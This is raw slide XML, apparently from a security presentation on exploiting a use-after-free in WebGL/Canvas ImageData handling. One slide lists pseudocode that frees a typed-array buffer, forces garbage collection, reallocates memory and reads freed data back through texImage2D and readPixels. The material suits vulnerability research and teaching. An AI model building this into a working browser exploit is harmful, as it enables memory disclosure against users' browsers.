          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGLTexture</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464ECADB-A078-4828-A9D9-4751061EBC9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130913" y="3029175"/>
            <a:ext cx="5169082" cy="1311454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6EC3F86-8351-460E-8638-93CB405C6A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130913" y="4882228"/>
            <a:ext cx="5936637" cy="1950609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1367FC02-471E-4B28-BE1A-F3F8D19904C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074329" y="7436214"/>
            <a:ext cx="7193371" cy="700407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946C7ACC-1FB8-4DE7-B36B-E9EF073DA688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074328" y="8136621"/>
            <a:ext cx="7193371" cy="809130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29EFE00D-F544-4427-857D-677B915339A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074328" y="8937255"/>
            <a:ext cx="7193371" cy="812313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28208283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Two</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB770C9-1CA4-4F89-B5AE-AF143F1540B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2636098"/>
            <a:ext cx="10953455" cy="1103226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A293FAFE-AC41-4016-AB43-8E1754AE8F4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3739324"/>
            <a:ext cx="10953455" cy="1333465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C4745A-C398-4F96-8F4C-ECA5A8BD9EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="5072789"/>
            <a:ext cx="10953455" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebGLFramebuffer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3879DED-983D-40BD-8C36-5C7F5A81C505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="5703589"/>
            <a:ext cx="10953456" cy="1101733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A760DB-A50B-45AD-BE21-5F96840DC170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="7769838"/>
            <a:ext cx="10953455" cy="1371174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D744E04E-6A6A-41DF-A9C2-357B92E99945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="6773252"/>
            <a:ext cx="10953456" cy="1029287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21634198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2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Canvas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> Two</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>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2">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebGL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> pseudocode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var texture = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.createTexture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.bindTexture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(gl.TEXTURE_2D, texture);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var fb = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.createFramebuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.bindFramebuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.FRAMEBUFFER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, fb);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.framebufferTexture2D(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.FRAMEBUFFER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, texture, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>imageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(ta, dimension, dimension);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta.buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Allocate_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.texImage2D(gl.TEXTURE_2D, level, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>internalFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, format, type, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>imageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta1 = new Uint8Array(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>buffersize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.readPixels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(0, 0, dimension, dimension, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.RGBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.UNSIGNED_BYTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, ta1);</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>readPixels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> method needs to create a framebuffer first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//Bind a framebuffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//attach a texture on the framebuffer</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
